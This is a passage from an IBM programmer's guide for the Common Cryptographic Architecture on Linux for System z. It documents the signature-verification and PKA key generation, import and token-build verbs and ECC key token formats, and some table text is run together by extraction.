+PKA_public_key_identifier, +hash_length, +hash, +signature_field_length, +signature_field ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 0, 1, 2, or 3. +rule_array +Direction: Input Type: String +364 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Digital Signature Verify (CSNDDSV) +Keywords that provide control information to the verb.Akeyword specifies the method to use to verify +the digital signature. Each keyword is left-justified in an 8-byte field and padded on the right with +blanks.All keywords must be in contiguous storage. The rule_array keywords are described in +Table102. +Table102.KeywordsforDigitalSignatureVerifycontrolinformation +Keyword Description +| Digitalsignatureformattingmethod(OptionalandnotvalidwithECDSAkeyword.) +ISO-9796 VerifythedigitalsignatureonthehashaccordingtoISO-9796-1.Anyhashmethodisallowed.This +isthedefault. +PKCS-1.0 VerifythedigitalsignatureontheBER-encodedASN.1valueofthetypeDigestInfoasspecifiedin +theRSADataSecurity,Inc.PublicKeyCryptographyStandards#1blocktype00.Thetextmust +specifyBERencodedhashtext. +PKCS-1.1 VerifythedigitalsignatureontheBER-encodedASN.1valueofthetypeDigestInfoasspecifiedin +theRSADataSecurity,Inc.PublicKeyCryptographyStandards#1blocktype01.Thetextmust +specifyBERencodedhashtext. +ZERO-PAD FormatthehashbypaddingitontheleftwithbinaryzerostothelengthofthePKAkeymodulus. +Anysupportedhashfunctionisallowed. +X9.31 FormataccordingtoANSIX9.31standard. +| Trustedpublickeyrestriction(Optional.NotvalidwithECDSAkeyword.Validonlywithtrustedblocks.See +| “Trustedblocks”onpage444.) +TPK-ONLY Permitstheuseofonlypublickeyscontainedintrustedblocks.Byspecifyingthiskeyword,theuse +ofregularCCARSAkeytokensisrejectedandonlytheuseofa(trusted)publickeysuppliedby +thePKA_public_key_identifierparametercanbeusedtoverifythedigitalsignature,thusassuringa +sensitivesignatureverificationoperationislimitedtotrustedpublickeys. +IfTPK-ONLYisspecified,thePKA_public_key_identifierparametermustidentifyatrustedblock +thatcontainstwosectionsafterthetrustedblocktokenheader:(1)trustedblocktrustedRSApublic +key(sectionX'11'),and(2)trustedblockinformation(sectionX'14').SectionX'14'isrequiredforall +trustedblocks.SectionX'11'containsthetrustedpublickey,anditsusagerulesmustindicateit +canbeusedindigitalsignatureoperations. +| Tokenalgorithm(One,optional) +|| ECDSA VerifyanECCdigitalsignature.ThiskeywordwasintroducedwithCCA4.1.0.Whenspecified,this +| istheonlykeywordpermittedintherule_array. +|| RSA VerifyanRSAdigitalsignature.Thisisthedefault.ThiskeywordwasintroducedwithCCA4.1.0. +PKA_public_key_identifier_length +Direction: Input Type: Integer +| The length of the PKA_public_key_identifier field containing the public key token or label. The +| maximum size is 3500 bytes. +PKA_public_key_identifier +Direction: Input Type: String +| Atoken or label of the RSApublic key or internal trusted block. If the signature algorithm is ECDSA, +| this must be a token label or an ECC public key. +hash_length +Direction: Input Type: Integer +| The length of the hash parameter in bytes. It must be the exact length of the text that was signed. The +| maximum size is 512 bytes. +hash +Chapter10.Usingdigitalsignatures 365 + +Digital Signature Verify (CSNDDSV) +Direction: Input Type: String +The application-supplied text on which the supplied signature was generated. The text must have been +previously hashed and, for PKCS formatting, BER-encoded as previously described. +signature_field_length +Direction: Input Type: Integer +| The length in bytes of the signature_field parameter. The maximum size is 512 bytes. +signature_field +Direction: Input Type: String +This field contains the digital signature to verify. The digital signature is in the low-order bits +(right-justified) of a string whose length is the minimum number of bytes that can contain the digital +signature. This string is left-justified within the signature_field. +Restrictions +The ability to recover a message from a signature (which ISO-9796 allows but does not require) is not +supported. +The exponent of the RSApublic key must be odd. +Although ISO-9796 does not require the input hash to be an integral number of bytes in length, this +service requires you to specify the hash_length in bytes. +X9.31 requires the RSAtoken to have a minimum modulus bit length of 1024, and the length must also be +a multiple of 256 bits (or 32 bytes). +Required commands +| This verb requires the Digital Signature Verify command (offset X'0101') to be enabled in the active role. +Usage notes +None +Related information +Trusted Block Create (CSNDTBC), Remote Key Export (CSNDRKX) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDDSVJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDDSVJ are shown here. +366 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Digital Signature Verify (CSNDDSV) +Format +public native void CSNDDSVJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PKA_public_key_identifier_length, +byte[] PKA_public_key_identifier, +hikmNativeInteger hash_length, +byte[] hash, +hikmNativeInteger signature_field_length, +byte[] signature_field ); +Chapter10.Usingdigitalsignatures 367 + +Digital Signature Verify (CSNDDSV) +368 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 11. Managing PKA cryptographic keys +This chapter describes the verbs that generate and manage PKAkeys. +v “PKAKey Generate (CSNDPKG)” on page 370 +v “PKAKey Import (CSNDPKI)” on page 374 +v “PKAKey Token Build (CSNDPKB)” on page 377 +v “PKAKey Token Change (CSNDKTC)” on page 385 +v “PKAKey Translate (CSNDPKT)” on page 388 +v “PKAPublic Key Extract (CSNDPKX)” on page 392 +| v “Remote Key Export (CSNDRKX)” on page 394 +| v “Trusted Block Create (CSNDTBC)” on page 403 +©CopyrightIBMCorp.2007,2011 369 + +PKA Key Generate (CSNDPKG) +PKA Key Generate (CSNDPKG) +| Use the PKAKey Generate verb to generate RSAkeys for use on the cryptographic coprocessor or other +| CCAsystems, or ECC keys for use on the CEX3C. Input to the PKAKey Generate verb is either a +| skeleton key token that has been built by the PKAKey Token Build verb, or a valid internal token. In the +| case of a valid internal token, the PKAKey Generate verb will generate a key with the same modulus +| length and the same exponent. +| Input to the PKAKey Generate verb is either a skeleton key token that has been built by the PKAKey +| Token Build verb, or a valid internal token. In the case of a valid internal token, the verb will generate a +| key with the same modulus length and the same exponent. In the case of a valid internal ECC token, PKA +| Key Generate will generate a key based on the curve type and size. Internal tokens with a X'09' section +| are not supported. +RSAkey generation requires the following information in the input skeleton token: +| v Size of the modulus in bits. The modulus for Modulus-Exponent format keys is between 512 and 1024 +| bits in length. The CRT modulus is between 512 and 4096 bits in length. The modulus for the +| variable-length Modulus-Exponent format is between 512 and 4096 bits in length. +RSAkey generation has the following restrictions: +v For Modulus-Exponent, there are restrictions on modulus, public exponent, and private exponent. +v For CRT, there are restrictions on dp, dq, U, and public exponent. +See the Key value structure in “PKAKey Token Build (CSNDPKB)” on page 377 for a summary of +restrictions. +| ECC key generation requires this information in the skeleton token: +| v The key type: ECC +| v The type of curve: Prime or Brainpool +| v The size of p in bits: 192, 224, 256, 384 or 521 for Prime curves and 160, 192, 224, 256, 320, 384, or +| 512 for Brainpool curves +| v Key usage information +| v Optionally, application associated data +| The generated ECC private key will be returned in one of the following forms: +| v Clear key +| v Encrypted key enciphered under the APKA-MK +| v Encrypted key enciphered by a transport key +Format +CSNDPKG( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +regeneration_data_length, +regeneration_data, +skeleton_key_identifier_length, +skeleton_key_identifier, +transport_key_identifier, +generated_key_token_length, +generated_key_token ) +370 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Generate (CSNDPKG) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1 or 2. +rule_array +Direction: Input Type: String +Akeyword that provides control information to the verb.Akeyword is left-justified in an 8-byte field and +padded on the right with blanks. The rule_array keywords are described in Table103. +Table103.KeywordsforPKAKeyGeneratecontrolinformation +Keyword Description +| Privatekeyencryption(One,required) +CLEAR Returntheprivatekeyincleartext.Theprivatekeyincleartextisanexternaltoken. +MASTER Enciphertheprivatekeyunderthemasterkey. +RETAIN Retainstheprivatekeywithinthecryptographicengineandreturnsthepublickey.Thisisonly +validforRSAsignaturekeys.Becauseofthis,theRETAINkeywordisnotsupportedfor: +v AskeletontokenwithaX'09'sectionprovided. +v AnECCtoken. +Beforeusingthiskeyword,seetheinformationaboutretainedkeysin“Usingretainedkeys”on +page299. +Note: Takespecialnoticeonthetypesofskeletonkeytokensthatcanbepassed.ThePKA +KeyTokenBuildverbwill,ofcourse,letyoucreatemanymoretypesofskeletonkeytokens +thancanbeusedtogenerateretainedkeys,becausethisistheminorityofsupportedfunction. +| XPORT EncipherstheprivatekeyundertheIMPORTERorEXPORTERkey-encrypting-keyidentifiedby +| thetransport_key_identifierparameter.ValidonlyforRSAkeys.IgnoredforECCkeys. +Regenerationdataoption(One,optional) +|| ITER-38 Force38iterationsoftestsforprimality,asrequiredbyANSIX9.31fortheMiller-Rabinprimality +| tests.Thisoptionproducesamoresecurekey,butitislaborintensive.Thiskeywordisinvalid +| forECCkeygeneration.ThiskeywordwasintroducedwithCCA4.1.0. +regeneration_data_length +Direction: Input Type: Integer +| The regeneration_data_length parameter must be 0 for ECC tokens. For RSAtokens, the +| regeneration_data_length can be nonzero. If it is nonzero, it must be between 8 and 512 bytes +| inclusive. +regeneration_data +Direction: Input Type: String +This field points to a string variable containing a string used as the basis for creating a particular +public-private key pair in a repeatable manner. +skeleton_key_identifier_length +Direction: Input Type: Integer +| The length of the skeleton_key_identifier parameter in bytes. The maximum allowed value is 3500 +| bytes. +Chapter11.ManagingPKAcryptographickeys 371 + +PKA Key Generate (CSNDPKG) +skeleton_key_identifier +Direction: Input Type: String +| The application-supplied skeleton key token generated by PKAKey Token Build, or the label of the +| token that contains the required modulus length and public exponent for RSAkey generation, or the +| required curve type and bit length for ECC key generation. +| If RETAIN was specified and the skeleton_key_identifier is a label, the label must match the private +| key name of the key. For RSAkeys, the skeleton_key_identifier parameter must contain a token that +| specifies a modulus length in the range 512 - 4096 bits. +transport_key_identifier +Direction: Input Type: String +A64-byte field to contain a DES key identifier. This field must be binary zeros, unless the XPORT rule +is specified. For XPORT rule, this is an IMPORTER or EXPORTER key or the label of an IMPORTER +or EXPORTER key that is used to encrypt the generated key. If you specify a label, it must resolve +uniquely to either an IMPORTER or EXPORTER key. Valid only for RSAkeys. +generated_key_token_length +Direction: Input/Output Type: Integer +| The length of the generated key token. The field is checked to ensure that it is at least equal to the +| token being returned. The maximum size is 3500 bytes. On output, this field is updated with the actual +| token length. +generated_key_token +Direction: Input/Output Type: String +| The internal token or label of the generated RSAor ECC key. If a label is specified in the +| generated_key_token parameter, the generated_key_token_length returned to the application will be +| the same as the input length. If a label is specified in the generated_key_token parameter, a record +| must already exist in the PKAkey storage file with this same label or the service will fail. +Restrictions +| v The maximum public exponent is 17 bits for any key that has a modulus greater than 2048 bits. +| v Not all IBM implementations of CCAsupport a CRT form of the RSAprivate key; check the +| product-specific literature. The IBM implementations support an optimized RSAprivate key (a key in +| Chinese Remainder Theorem format). The formats vary between versions. +| v See “PKAkey tokens” on page 48 for the formats used when generating the various forms of key +| tokens. +| v Keys with a modulus length greater than 2048 bits are not supported in releases before Release 3.30. +| v When generating a key for use withANSI X9.31 digital signatures, the modulus length must be: 1024, +| 1280, 1536, 1792, 2048, or 4096 bits. +| v The key label used for a retained key must not exist in the external PKAkey-storage held on the hard +| disk drive. +| v Due to potential loss of a retained private key within the cryptographic engine, retained keys should be +| avoided for key management purposes. +| v Rule-array keyword ITER-38 is not supported in releases before Release 4.1.0. +| v ECC key tokens are not supported in releases before Release 4.1.0. +Required commands +| This verb requires the PKAKey Generate command (offset X'0103') to be enabled in the active role. +| With the CLEAR rule-array keyword, enable PKAKey Generate - Clear (offset X'0205' in the hardware. +372 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Generate (CSNDPKG) +| To generate ECC keys with the CLEAR rule-array keyword, this verb requires the Generate ECC keys in +| the clear command (offset X'0326') to be enabled in the active role. +To generate keys based on the value supplied in the regeneration_data variable, you must enable one of +these commands: +| v When not using the RETAIN keyword, enable the PKAKey Generate - Permit Regeneration Data +| command (offset X'027D'). +| v When using the RETAIN keyword, enable the PKAKey Generate - Permit Regeneration Data Retain +| command (offset X'027E'). +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDPKGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDPKGJ are shown here. +Format +public native void CSNDPKGJ ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger regeneration_data_length, +byte[] regeneration_data, +hikmNativeInteger skeleton_key_token_length, +byte[] skeleton_key_token, +byte[] transport_key_identifier, +hikmNativeInteger generated_key_identifier_length, +byte[] generated_key_identifier ); +Chapter11.ManagingPKAcryptographickeys 373 + +PKA Key Import (CSNDPKI) +PKA Key Import (CSNDPKI) +| This verb imports an external PKAor ECC private key token. (This consists of a PKAor ECC private key +| and public key.) The secret values of the key can be clear or encrypted under a limited-authority DES +| importer key. +This verb can also import a clear PKAkey. The PKAKey Token Build verb creates a clear PKAkey token. +Output of this verb is a CCAinternal token of the RSAprivate key. +Format +CSNDPKI( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +source_key_identifier_length, +source_key_identifier, +importer_key_identifier, +target_key_identifier_length, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 0 or 1. +rule_array +|| Direction: Input Type: String +| The rule_array parameter is a pointer to a string variable containing a keyword. The keyword is 8 +| bytes in length and must be left-aligned and padded on the right with space characters. The rule_array +| keywords are described in Table104. +|| Table104.KeywordsforPKAKeyImportcontrolinformation +|| Keyword Description +| Tokentype(One,optional) +|| ECC SpecifiesthatthekeybeingimportedisanECCkey.ThiskeywordwasintroducedwithCCA +| 4.1.0. +|| RSA SpecifiesthatthekeybeingimportedisanRSAkeyoratrustedblock.Thisisthedefault.This +| keywordwasintroducedwithCCA4.1.0. +| +| source_key_identifier_length +Direction: Input Type: Integer +| The length of the source_key_identifier parameter. The maximum size is 3500 bytes. +source_key_identifier +374 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Import (CSNDPKI) +|| Direction: Input Type: String +| Contains an external token or label of a PKAprivate key, without section identifier X'14' (Trusted Block +| Information), or the trusted block in external form as produced by the Trusted Block Create verb with +| theACTIVATE keyword. +| If a PKAprivate key without the section identifier X'14' is passed in: +| v There are no qualifiers.Aretained key can not be used. +| v The key token must contain both public-key and private-key information. The private key can be in +| cleartext or it can be enciphered. ECC tokens must contain a private key in cleartext. +| v This is the output of the PKAKey Generate (CSNDPKG) verb or the PKAKey Token Build +| (CSNDPKB) verb. +| v If encrypted, the key was created on another platform. +| If a PKAprivate key with the section identifier X'14' is passed in: +| v This verb will be used to encipher the MAC key within the trusted block under the PKAmaster key +| instead of the IMP-PKAkey-encrypting key. +| v The importer_key_identifier must contain an IMP-PKAKEK. +importer_key_identifier +Direction: Input/Output Type: String +ADES internal token or the label of an IMP-PKAkey. This is a limited authority key-encrypting key. It +is ignored for clear tokens. +target_key_identifier_length +Direction: Input/Output Type: Integer +| The length of the target_key_identifier parameter. The maximum size is 3500 bytes. On output, and if +| the size is of sufficient length, the variable is updated with the actual length of the target_key_identifier +| field. +target_key_identifier +Direction: Input/Output Type: String +| This field contains the internal token or label of the imported PKAprivate key or a trusted block. If a +| label is specified on input, a PKAkey storage record with this label must exist. The PKAkey storage +| record with this label will be overwritten with the imported key unless the existing record is a retained +| key. If the record is a retained key, the import will fail.Aretained key record cannot be overwritten. If +| no label is specified on input, this field should be set to binary zeros on input. +Restrictions +This verb imports RSAkeys of up to 2048 bits. However, the hardware configuration sets the limits on the +modulus size of keys for digital signatures and key management; thus, the key can be successfully +imported but fail when used if the limits are exceeded. +The importer_key_identifier parameter is a limited-authority key-encrypting key. +CRT form tokens with a private section ID of X'05' cannot be imported. +Required commands +| This verb requires the PKAKey Import command (offset X'0104') to be enabled in the active role. If the +| source_key_token parameter points to a trusted block, also enable the PKAKey Import - Import an +| External Trusted Key Block to internal form command (offset X'0311'). +Chapter11.ManagingPKAcryptographickeys 375 + +PKA Key Import (CSNDPKI) +Usage notes +This verb imports keys of any modulus size up to 2048 bits. However, the hardware configuration sets the +limits on the modulus size of keys for digital signatures and key management; thus, the key can be +successfully imported but fail when used if the limits are exceeded. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDPKIJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDPKIJ are shown here. +Format +public native void CSNDPKIJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger source_key_token_length, +byte[] source_key_token, +byte[] transport_key_identifier, +hikmNativeInteger target_key_identifier_length, +byte[] target_key_identifier +); +376 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Token Build (CSNDPKB) +PKA Key Token Build (CSNDPKB) +| Use this verb to build external PKAkey tokens containing unenciphered private RSAor ECC keys. You +| can use this token as input to the PKAKey Import verb to obtain an operational internal token containing +| an enciphered private key. This verb builds a skeleton token that you can use as input to the PKAKey +| Generate verb (see Table103 on page 371). You can also input to this verb a clear unenciphered public +| RSAor ECC key and return the public key in a token format that other PKAverbs can use directly. +| This verb is used to create the following: +| v Askeleton_key_token for use with the PKAKey Generate verb. +| v Akey token with a public key that has been obtained from another source. +| v Akey token with a clear private-key and the associated public key. +| v Akey token for an RSAprivate key in optimized Chinese Remainder Theorem (CRT) format. +| v An RSAtoken with X'09' section identifier using the RSAMEVAR keyword to obtain a token for a key in +| Modulus-Exponent format that is variable length. +| ECC key generation requires this information in the skeleton token: +| v The key type: ECC +| v The type of curve: Prime or Brainpool +| v The size of p in bits: 192, 224, 256, 384 or 521 for Prime curves and 160, 192, 224, 256, 320, 384, or +| 521 for Brainpool curves +| v Key usage information +| v Optionally, application associated data +Format +CSNDPKB( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_value_structure_length, +key_value_structure, +private_key_name_length, +private_key_name, +| customer_data_length, +| customer_data, +reserved_2_length, +reserved_2, +reserved_3_length, +reserved_3, +reserved_4_length, +reserved_4, +reserved_5_length, +reserved_5, +key_token_length, +key_token ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Chapter11.ManagingPKAcryptographickeys 377 + +PKA Key Token Build (CSNDPKB) +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, or 3. +rule_array +Direction: Input Type: String +One or two keywords that provide control information to the verb. The keywords must be in contiguous +storage with each of the keywords left-justified in its own 8-byte location and padded on the right with +blanks. The rule_array keywords are described in Table105. +Table105.KeywordsforPKAKeyTokenBuildcontrolinformation +Keyword Description +| Keytype(One,required) +|| ECC-PAIR ThiskeywordindicatesbuildingatokencontainingbothpublicandprivateECCkeyinformation. +| Theparameterkey_value_structureidentifiestheinputkeyvalues,ifsupplied. +|| ECC-PUBL ThiskeywordindicatesbuildingatokencontainingpublicECCkeyinformation.Theparameter +| key_value_structureidentifiestheinputvalues,ifsupplied. +RSA-CRT ThiskeywordindicatesbuildingatokencontaininganRSAprivatekeyintheoptimizedChinese +RemainderTheorem(CRT)format.Theparameterkey_value_structureidentifiestheinputkey +values,ifsupplied. +RSA-PRIV ThiskeywordindicatesbuildingatokencontainingbothpublicandprivateRSAkeyinformation. +Theparameterkey_value_structureidentifiestheinputkeyvalues,ifsupplied. +RSA-PUBL ThiskeywordindicatesbuildingatokencontainingpublicRSAkeyinformation.Theparameter +key_value_structureidentifiestheinputvalues,ifsupplied. +|| RSAMEVAR ThiskeywordindicatesRSA-ModulusExponent-Variant(RSAMEVAR),atypeX'09'keytokenfor +| RSA,namedVAR_OPK. +| Note: KeytokenscreatedwiththiskeytypecannotbepassedtothePKAKeyGenerateverbfor +| creatingRETAIN(retained)keys. +| Keyusagecontrol(One,optional) +|| KEY-MGMT IndicatesthatanRSAorECCprivatekeycanbeusedinboththeSymmetricKeyImportandthe +| DigitalSignatureGenerateverbs. +| Note: KeytokenscreatedwiththiskeyusagecannotbepassedtothePKAKeyGenerateverb +| forcreatingRETAIN(retained)keys. +|| KM-ONLY IndicatesthatanRSAorECCprivatekeycanbeusedonlyinsymmetrickeydistribution. +| Note: KeytokenscreatedwiththiskeyusagecannotbepassedtothePKAKeyGenerateverb +| forcreatingRETAIN(retained)keys. +|| SIG-ONLY IndicatesthatanRSAorECCprivatekeycannotbeusedinsymmetrickeydistribution.Thisisthe +| default. +| Note: OnlyaskeletontokencreatedfromPKAKeyTokenBuildwiththiskeyusagetypecanbe +| passedtoPKAKeyGeneratetocreateaRETAIN(retained)key. +| Translatecontrol(One,optional) +|| NO-XLATE TheRSAorECCkeycannotbeusedasakey-encrypting-keyfor“PKAKeyTranslate(CSNDPKT)” +| onpage388. +| Note: Useofthiskeyworddoesnotmatterwhencreatingaskeletonkeytokenforalaterretained +| keygenerationoperation.ItisredundanttothenecessarySIG-ONLYkeyword. +|| XLATE-OK TheRSAorECCkeycanbeusedasakey-encrypting-keyfor“PKAKeyTranslate(CSNDPKT)”on +| page388. +| Note: KeytokenscreatedwiththiskeywordcannotbepassedtothePKAKeyGenerateverbfor +| creatingRETAIN(retained)keys. +key_value_structure_length +Direction: Input Type: Integer +378 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PKA Key Token Build (CSNDPKB) +This is a segment of contiguous storage containing a variable number of input clear key values. The +length depends on the key type parameter in the rule_array and on the actual values input. The length +is in bytes. For maximum values, see Table106. +|| Table106.PKAKeyTokenBuild-Keyvaluestructurelengthmaximumvalues +|| Keytype Keyvaluestructuremaximumvalue +|| ECC-PAIR 207 +|| ECC-PUBL 139 +|| RSA-CRT,RSAMEVAR 3500 +|| RSA-PRIV 648 +|| RSA-PUBL 520 +| +key_value_structure +Direction: Input Type: String +This is a segment of contiguous storage containing a variable number of input clear key values and +the lengths of these values in bits or bytes, as specified. The structure elements are ordered, of +variable length, and the input key values must be right-justified within their respective structure +elements and padded on the left with binary zeros. If the leading bits of the modulus are zeros, do not +count them in the length. Table107 defines the structure and contents as a function of key type. +Table107.PKAKeyTokenBuild-Keyvaluestructureelements +Length +Offset (bytes) Description +| Keyvaluestructure(ECC-PAIR) +000 001 Curvetype: +X'00' Primecurve +X'01' Brainpoolcurve +||| 001 001 ReservedX'00' +||| 002 002 Lengthofpinbits +|| X'00A0' Brainpoolp-160 +|| X'00C0' PrimeP-192,BrainpoolP-192 +|| X'00E0' PrimeP-224,BrainpoolP-224 +|| X'0100' PrimeP-256,BrainpoolP-256 +|| X'0140' BrainpoolP-320 +|| X'0180' PrimeP-384,BrainpoolP-384 +|| X'0200' BrainpoolP-512 +|| X'0209' PrimeP-521 +||| 004 002 ddd-thisfieldisthelengthoftheprivatekeydinbytes.Thisvaluecanbezeroifthe +| keytokenisusedasaskeletonkeytokeninthePKAKeyGenerateverb.The +| maximumvalueis66bytes. +||| 006 002 xxx-thisfieldisthelengthofthepublickeyQinbytes.Thisvaluecanbezeroifthe +| keytokenisusedasaskeletonkeytokeninthePKAKeyGenerateverb.The +| maximumvalueis133bytes,whichincludesonebytetoindicateifthevalueis +| compressed. +||| 008 ddd Privatekey,d +||| 008+ddd xxx Publickey,Q +| Keyvaluestructure(ECC-PUBL) +000 001 Curvetype: +X'00' Primecurve +X'01' Brainpoolcurve +||| 001 001 ReservedX'00' +Chapter11.ManagingPKAcryptographickeys 379 + +PKA Key Token Build (CSNDPKB) +Table107.PKAKeyTokenBuild-Keyvaluestructureelements (continued) +Length +Offset (bytes) Description +||| 002 002 Lengthofpinbits +|| X'00A0' Brainpoolp-160 +|| X'00C0' PrimeP-192,BrainpoolP-192 +|| X'00E0' PrimeP-224,BrainpoolP-224 +|| X'0100' PrimeP-256,BrainpoolP-256 +|| X'0140' BrainpoolP-320 +|| X'0180' PrimeP-384,BrainpoolP-384 +|| X'0200' BrainpoolP-512 +|| X'0209' PrimeP-521 +||| 004 002 xxx-thisfieldisthelengthofthepublickeyQinbytes.Thisvaluecanbezeroifthe +| keytokenisusedasaskeletonkeytokeninthePKAKeyGenerateverb.The +| maximumvalueis133bytes,whichincludesonebytetoindicateifthevalueis +| compressed. +||| 006 xxx Publickey,Q +Keyvaluestructure(OptimizedRSA,ChineseRemainderTheoremformat,RSA-CRT) +000 002 Moduluslengthinbits(512-2048).Thisisrequired. +002 002 Modulusfieldlengthinbytes,“nnn.”Thisvaluecanbezeroifthekeytokenisused +asaskeleton_key_tokeninthePKAKeyGenerateverb.Thisvaluemustnotexceed +256. +004 002 Publicexponentfieldlengthinbytes,“eee.”Thisvaluecanbezeroifthekeytokenis +usedasaskeleton_key_tokeninthePKAKeyGenerateverb. +006 002 Reserved,binaryzero. +008 002 Lengthoftheprimenumber,p,inbytes,“ppp.”Thisvaluecanbezeroifthekey +tokenisusedasaskeleton_key_tokeninthePKAKeyGenerateverb.Maximumsize +ofp+qis256bytes. +010 002 Lengthoftheprimenumber,q,inbytes,“qqq.”Thisvaluecanbezeroifthekey +tokenisusedasaskeleton_key_tokeninthePKAKeyGenerateverb.Maximumsize +ofp+qis256bytes. +012 002 Lengthofd ,inbytes,“rrr.”Thisvaluecanbezeroifthekeytokenisusedasa +p +skeleton_key_tokeninthePKAKeyGenerateverb.Maximumsizeofd +d is256 +p q +bytes. +014 002 Lengthofd ,inbytes,“sss.”Thisvaluecanbezeroifthekeytokenisusedasa +q +skeleton_key_tokeninthePKAKeyGenerateverb.Maximumsizeofd +d is256 +p q +bytes. +016 002 LengthofU,inbytes,“uuu.”Thisvaluecanbezeroifthekeytokenisusedasa +skeleton_key_tokeninthePKAKeyGenerateverb.MaximumsizeofUis256bytes. +018 nnn Modulus,n. +018+nnn eee Publicexponent,e.Thisisanintegersuchthat1 +ECC key token +| +| Table133 shows the format of an ECC key token. +|| Table133.ECCkeytokenformat +| Offset +||| (Decimal) Lengthinbytes Description +||| 000 001 Tokenidentifier +|| X'00' Null +|| X'1E' Externaltoken +|| X'1F' Internaltoken;theprivatekeyisprotectedbythemasterkey +||| 001 001 X'00',version. +||| 002 002 Lengthofthekeytokenstructureexcludingtheinternalinformation +| section. +||| 004 004 Ignored;shouldbezero. +| ECCtokenprivatesection +||| 000 001 X'20',sectionidentifier,ECCprivatekey +||| 001 001 X'00',version. +||| 002 002 Sectionlength. +||| 004 001 WrappingMethod:Thisvalueindicatesthewrappingmethodusedto +| protectthedataintheencryptedsection.Itisnotthemethodusedto +| protecttheObjectProtectionKey(OPK). +|| X'00' Clear–sectionisunencrypted. +|| X'01' AESKW +|| X'02' CBCWrap-Other +||| 005 001 HashusedforWrapping +|| X'01' SHA224 +|| X'02' SHA256 +|| X'04' Reserved +|| X'08' Reserved +||| 006 002 Reservedbinaryzero +||| 008 001 KeyUsage: +|| X'C0' Keyagreement +|| X'80' Bothsignaturegenerationandkeyagreement +|| X'00' Signaturegenerationonly +|| X'02' Translateallowed +| Thetwohigh-orderbitsindicatepermittedkeyusageinthedecryptionof +| symmetrickeysandinthegenerationofdigitalsignatures.Thebitinthe +| secondnibbleindicatesifthekeyistranslatable.Akeyistranslatableifit +| canbere-encryptedfromonekeyencryptingkeytoanother. +436 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token formats +| Table133.ECCkeytokenformat (continued) +| Offset +||| (Decimal) Lengthinbytes Description +||| 009 001 Curvetype: +|| X'00' Primecurve +|| X'01' Brainpoolcurve +||| 010 001 Keyformatandsecurityflag. +| ExternalToken: +|| X'40' UnencryptedECCprivatekeyidentifier +|| X'42' EncryptedECCprivatekeyidentifier +| Internaltoken: +|| X'08' EncryptedECCprivatekeyidentifier +||| 011 001 Reservedbinaryzero +||| 012 002 Lengthofpinbits +|| X'00A0' Brainpoolp-160 +|| X'00C0' PrimeP-192,BrainpoolP-192 +|| X'00E0' PrimeP-224,BrainpoolP-224 +|| X'0100' PrimeP-256,BrainpoolP-256 +|| X'0140' BrainpoolP-320 +|| X'0180' PrimeP-384,BrainpoolP-384 +|| X'0200' BrainpoolP-512 +|| X'0209' PrimeP-521 +||| 014 002 IBMassociateddatalength.Thelengthofthisfieldmustbegreaterthan +| orequalto16. +||| 016 008 Externaltoken:Reservedbinaryzero. +| InternalToken:MKVP +||| 024 048 Externaltoken:Reservedbinaryzero. +| InternalToken:ObjectProtectionKey(OPK),ICV(IntegrityCheckvalue), +| 8byteconfounderanda256-bitAESkeyusedwiththeAESKWalgorithm +| toencrypttheECCprivatekey. +| TheOPKisencryptedbytheAESmasterkeyusingAESKWaswell. +| ExampleformatforOPKdatapassedtoAESKW: +| v 8bytes=A6A6A6A6A6A60000 +| v 40bytes=Confounder(8)/Key(32) +||| 072 002 Associateddatalength,aa +||| 074 002 Lengthofformattedsectioninbytes,bb +||| 076 aa Associateddata.See“AssociateddataformatforECCprivatekeytoken” +| onpage438. +||| 076+aa Startofformatted 